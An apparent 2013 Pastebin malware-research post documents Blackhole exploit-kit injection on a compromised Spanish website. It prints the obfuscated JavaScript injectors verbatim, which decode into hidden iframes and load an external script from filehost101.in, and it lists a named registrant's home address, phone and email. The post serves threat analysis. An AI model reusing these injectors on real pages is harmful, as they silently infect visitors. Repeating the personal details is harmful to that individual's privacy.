SHARE
TWEET

FASTVPS.RU DNS is used to spread multiple EK infector

MalwareMustDie Jan 2nd, 2013 88 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =====================================================
  2. #MalwareMustDie! Happy New Year Case:
  3. FASTVPS.RU DNS Service is being used to spread
  4. multiple Blackhole Landing Page infection.
  5.  
  6. Bad actor's ID is:
  7. Registrant ID:55f7cab898d98545
  8. Registrant Name:Stepan  Ahmethanov
  9. Registrant Organization:
  10. Registrant Street1:Prospekt Mira 28
  11. Registrant Street2:
  12. Registrant Street3:
  13. Registrant City:Moscow
  14. Registrant State/Province:Moscow
  15. Registrant Postal Code:129074
  16. Registrant Country:RU
  17. Registrant Phone:+7.9653428756
  18. Registrant Phone Ext.:
  19. Registrant FAX:
  20. Registrant FAX Ext.:
  21. Registrant Email:keyb@exchangezones.net
  22.  
  23. ----
  24. [0x00000000]> !date
  25. Wed Jan  2 19:48:55 JST 2013
  26. =====================================================
  27.  
  28. Infector Evidence:
  29. http://urlquery.net/report.php?id=581367
  30.  
  31. Infector url:
  32. h00p://perso.wanadoo.es/idiomavalencia/ilinks.htm
  33.  
  34. //download evidence:
  35.  
  36. --19:14:33--  h00p://perso.wanadoo.es/idiomavalencia/ilinks.htm
  37.           => `ilinks.htm'
  38. Resolving perso.wanadoo.es... seconds 0.00, 62.37.237.60
  39. Caching perso.wanadoo.es => 62.37.237.60
  40. Connecting to perso.wanadoo.es|62.37.237.60|:80... seconds 0.00, connected.
  41.  
  42. ---request begin---
  43. GET /idiomavalencia/ilinks.htm h00p/1.0
  44. Referer: http://perso.wanadoo.es
  45. User-Agent: #MalwareMustDie Wishes you Miserable New Year 2013!!
  46. Accept: */*
  47. Host: perso.wanadoo.es
  48. Connection: Keep-Alive
  49.  
  50. ---request end---
  51. http request sent, awaiting response...
  52. ---response begin---
  53. HTTP/1.1 200 OK
  54. Date: Wed, 02 Jan 2013 10:14:29 GMT
  55. Server: Apache/1.3.26 (Unix) mod_layout/3.2
  56. X-Powered-By: ModLayout/3.2
  57. Connection: close
  58. Content-Type: text/html
  59.  
  60. ---response end---
  61. 200 OK
  62. Length: unspecified [text/html]
  63. 19:14:35 (24.40 KB/s) - `ilinks.htm' saved [32665]
  64.  
  65. // refere to the download HTM file -
  66. // it has evil script after the body tag
  67.  
  68. <script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));}e(ss);}</script><script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));}e(ss);}</script><script type="text/javascript" src="h00p://filehost101.in/tds777/social.js"></script><script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$48$55$26$21$26.5$55$52.5$53$26$21$26.5$16.5$28$27$20.5$49.5$48$54$45.5$51.5$47.5$28$14$17.5$26.5$3.5$1.5$1.5$59.5$3.5$1.5$1.5$48$55.5$52$46.5$55$49.5$52.5$52$13$49.5$48$54$45.5$51.5$47.5$54$17$17.5$58.5$3.5$1.5$1.5$1.5$56$45.5$54$13$48$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$49.5$48$54$45.5$51.5$47.5$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$54.5$54$46.5$16.5$19$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$17.5$26.5$48$20$54.5$55$57.5$51$47.5$20$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$27.5$16.5$49$49.5$47$47$47.5$52$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$53$52.5$54.5$49.5$55$49.5$52.5$52$27.5$16.5$45.5$46$54.5$52.5$51$55.5$55$47.5$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$51$47.5$48$55$27.5$16.5$21$16.5$26.5$48$20$54.5$55$57.5$51$47.5$20$55$52.5$53$27.5$16.5$21$16.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$56.5$49.5$47$55$49$16.5$19$16.5$21.5$21$16.5$17.5$26.5$48$20$54.5$47.5$55$29.5$55$55$54$49.5$46$55.5$55$47.5$17$16.5$49$47.5$49.5$48.5$49$55$16.5$19$16.5$21.5$21$16.5$17.5$26.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$48$17.5$26.5$3.5$1.5$1.5$59.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-545!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}</script><script>if(window["document"])try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='qgode'["substr"](4-2);w=this;e=w[f["substr"](11)+zz];n="3.5#3.5#51.5#50#15#19#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#19.5#60.5#5.5#3.5#3.5#3.5#51.5#50#56#47.5#53.5#49.5#56#19#19.5#28.5#5.5#3.5#3.5#61.5#15#49.5#53#56.5#49.5#15#60.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#58.5#56#51.5#57#49.5#19#16#29#51.5#50#56#47.5#53.5#49.5#15#56.5#56#48.5#29.5#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#15#58.5#51.5#49#57#51#29.5#18.5#23.5#23#18.5#15#51#49.5#51.5#50.5#51#57#29.5#18.5#23.5#23#18.5#15#56.5#57#59.5#53#49.5#29.5#18.5#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#28#51#51.5#49#49#49.5#54#28.5#55#54.5#56.5#51.5#57#51.5#54.5#54#28#47.5#48#56.5#54.5#53#57.5#57#49.5#28.5#53#49.5#50#57#28#23#28.5#57#54.5#55#28#23#28.5#18.5#30#29#22.5#51.5#50#56#47.5#53.5#49.5#30#16#19.5#28.5#5.5#3.5#3.5#61.5#5.5#3.5#3.5#50#57.5#54#48.5#57#51.5#54.5#54#15#51.5#50#56#47.5#53.5#49.5#56#19#19.5#60.5#5.5#3.5#3.5#3.5#58#47.5#56#15#50#15#29.5#15#49#54.5#48.5#57.5#53.5#49.5#54#57#22#48.5#56#49.5#47.5#57#49.5#33.5#53#49.5#53.5#49.5#54#57#19#18.5#51.5#50#56#47.5#53.5#49.5#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#56.5#56#48.5#18.5#21#18.5#51#57#57#55#28#22.5#22.5#48.5#53#54.5#47.5#54#56.5#22#54.5#56#50.5#22.5#18.5#19.5#28.5#50#22#56.5#57#59.5#53#49.5#22#58#51.5#56.5#51.5#48#51.5#53#51.5#57#59.5#29.5#18.5#51#51.5#49#49#49.5#54#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#55#54.5#56.5#51.5#57#51.5#54.5#54#29.5#18.5#47.5#48#56.5#54.5#53#57.5#57#49.5#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#53#49.5#50#57#29.5#18.5#23#18.5#28.5#50#22#56.5#57#59.5#53#49.5#22#57#54.5#55#29.5#18.5#23#18.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#58.5#51.5#49#57#51#18.5#21#18.5#23.5#23#18.5#19.5#28.5#50#22#56.5#49.5#57#31.5#57#57#56#51.5#48#57.5#57#49.5#19#18.5#51#49.5#51.5#50.5#51#57#18.5#21#18.5#23.5#23#18.5#19.5#28.5#5.5#3.5#3.5#3.5#49#54.5#48.5#57.5#53.5#49.5#54#57#22#50.5#49.5#57#33.5#53#49.5#53.5#49.5#54#57#56.5#32#59.5#41#47.5#50.5#38#47.5#53.5#49.5#19#18.5#48#54.5#49#59.5#18.5#19.5#44.5#23#45.5#22#47.5#55#55#49.5#54#49#32.5#51#51.5#53#49#19#50#19.5#28.5#5.5#3.5#3.5#61.5"[((e)?"s":"")+"p"+"lit"]("a#"[((e)?"su":"")+"bstr"](1));try{q=document.createElement("div");q.appendChild(q);}catch(qw){h=-parseInt('012')/5;}
  69. for(i=6-2-1-2-1;i-545!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;if(e)e(""+q);}</script>
  70.  
  71. // I'll make it simple....
  72.  
  73.  <script>try
  74.  {
  75.    q=document.createElement("u");
  76.    q.appendChild(q+"");
  77.  }
  78.  catch(qw)
  79.  {
  80.    h=-012/5;
  81.    zz='a'+'l';
  82.    f='fr'+'o'+'m'+'Ch';
  83.    f+='arC';
  84.  }
  85.  try
  86.  {
  87.    begbe=prototype;
  88.  }
  89.  catch(b43gds)
  90.  {
  91.    zz='zv'.substr(123-122)+zz;
  92.    ss=[];
  93.    f+=(h)?'ode':"";
  94.    w=this;
  95.    e=w[f.substr(11)+zz];
  96.    n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,22.25,26.5,24,22.25,27,11,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];
  97.    for(i=6-2-1-2-1;i-545!=0;i++)
  98.    {
  99.      k=i;
  100.      ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));
  101.    }
  102.    e(ss);
  103.  }
  104.  </script><script>try
  105.  {
  106.    q=document.createElement("u");
  107.    q.appendChild(q+"");
  108.  }
  109.  catch(qw)
  110.  {
  111.    h=-012/5;
  112.    zz='a'+'l';
  113.    f='fr'+'o'+'m'+'Ch';
  114.    f+='arC';
  115.  }
  116.  try
  117.  {
  118.    begbe=prototype;
  119.  }
  120.  catch(b43gds)
  121.  {
  122.    zz='zv'.substr(123-122)+zz;
  123.    ss=[];
  124.    f+=(h)?'ode':"";
  125.    w=this;
  126.    e=w[f.substr(11)+zz];
  127.    n=[-0.75,-0.75,23.25,22.5,5,7,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,7.25,27.75,0.25,-0.75,-0.75,-0.75,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,11.75,0.25,-0.75,-0.75,28.25,5,22.25,24,25.75,22.25,5,27.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,26.75,25.5,23.25,26,22.25,7,5.5,12,23.25,22.5,25.5,21.25,24.25,22.25,5,25.75,25.5,21.75,12.25,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,5,26.75,23.25,22,26,23,12.25,6.75,9.25,9,6.75,5,23,22.25,23.25,22.75,23,26,12.25,6.75,9.25,9,6.75,5,25.75,26,27.25,24,22.25,12.25,6.75,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,11.5,23,23.25,22,22,22.25,24.5,11.75,25,24.75,25.75,23.25,26,23.25,24.75,24.5,11.5,21.25,21.5,25.75,24.75,24,26.25,26,22.25,11.75,24,22.25,22.5,26,11.5,9,11.75,26,24.75,25,11.5,9,11.75,6.75,12.5,12,8.75,23.25,22.5,25.5,21.25,24.25,22.25,12.5,5.5,7.25,11.75,0.25,-0.75,-0.75,28.25,0.25,-0.75,-0.75,22.5,26.25,24.5,21.75,26,23.25,24.75,24.5,5,23.25,22.5,25.5,21.25,24.25,22.25,25.5,7,7.25,27.75,0.25,-0.75,-0.75,-0.75,26.5,21.25,25.5,5,22.5,5,12.25,5,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,21.75,25.5,22.25,21.25,26,22.25,14.25,24,22.25,24.25,22.25,24.5,26,7,6.75,23.25,22.5,25.5,21.25,24.25,22.25,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,25.75,25.5,21.75,6.75,8,6.75,23,26,26,25,11.5,8.75,8.75,21.25,22.75,24,22.25,27,10.75,9,8.5,23.25,24.5,8.75,6.75,7.25,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26.5,23.25,25.75,23.25,21.5,23.25,24,23.25,26,27.25,12.25,6.75,23,23.25,22,22,22.25,24.5,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,25,24.75,25.75,23.25,26,23.25,24.75,24.5,12.25,6.75,21.25,21.5,25.75,24.75,24,26.25,26,22.25,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,24,22.25,22.5,26,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,26,27.25,24,22.25,8.5,26,24.75,25,12.25,6.75,9,6.75,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,26.75,23.25,22,26,23,6.75,8,6.75,9.25,9,6.75,7.25,11.75,22.5,8.5,25.75,22.25,26,13.25,26,26,25.5,23.25,21.5,26.25,26,22.25,7,6.75,23,22.25,23.25,22.75,23,26,6.75,8,6.75,9.25,9,6.75,7.25,11.75,0.25,-0.75,-0.75,-0.75,22,24.75,21.75,26.25,24.25,22.25,24.5,26,8.5,22.75,22.25,26,14.25,24,22.25,24.25,22.25,24.5,26,25.75,13.5,27.25,18,21.25,22.75,16.5,21.25,24.25,22.25,7,6.75,21.5,24.75,22,27.25,6.75,7.25,19.75,9,20.25,8.5,21.25,25,25,22.25,24.5,22,13.75,23,23.25,24,22,7,22.5,7.25,11.75,0.25,-0.75,-0.75,28.25];
  128.    for(i=6-2-1-2-1;i-545!=0;i++)
  129.    {
  130.      k=i;
  131.      ss=ss+String["from"+"CharCode"](-1*2*h*(3+1*n[k]));
  132.    }
  133.    e(ss);
  134.  }
  135.  </script><script type="text/javascript" src="h00p://filehost101.in/tds777/social.js"></script><script>try
  136.  {
  137.    q=document.createElement("u");
  138.    q.appendChild(q+"");
  139.  }
  140.  catch(qw)
  141.  {
  142.    h=-012/5;
  143.    zz='a'+'l';
  144.    f='fr'+'o'+'m'+'Ch';
  145.    f+='arC';
  146.  }
  147.  try
  148.  {
  149.    qwe=prototype;
  150.  }
  151.  catch(brebr)
  152.  {
  153.    zz='zv'.substr(123-122)+zz;
  154.    ss=[];
  155.    f+=(h)?'ode':"";
  156.    w=this;
  157.    e=w[f.substr(11)+zz];
  158.    n="1.5$1.5$49.5$48$13$17$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$46$52.5$47$57.5$16.5$17.5$42.5$21$43.5$17.5$58.5$3.5$1.5$1.5$1.5$49.5$48$54$45.5$51.5$47.5$54$17$17.5$26.5$3.5$1.5$1.5$59.5$13$47.5$51$54.5$47.5$13$58.5$3.5$1.5$1.5$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$56.5$54$49.5$55$47.5$17$14$27$49.5$48$54$45.5$51.5$47.5$13$54.5$54$46.5$27.5$16.5$49$55$55$53$26$20.5$20.5$58$53$54.5$55$45.5$55$54.5$20$49.5$52$20.5$16.5$13$56.5$49.5$47$55$49$27.5$16.5$21.5$21$16.5$13$49$47.5$49.5$48.5$49$55$27.5$16.5$21.5$21$16.5$13$54.5$55$57.5$51$47.5$27.5$16.5$56$49.5$54.5$49.5$46$49.5$51$49.5$55$57.5$26$49$49.5$47$47$47.5$52$26.5$53$52.5$54.5$49.5$55$49.5$52.5$52$26$45.5$46$54.5$52.5$51$55.5$55$47.5$26.5$51$47.5$4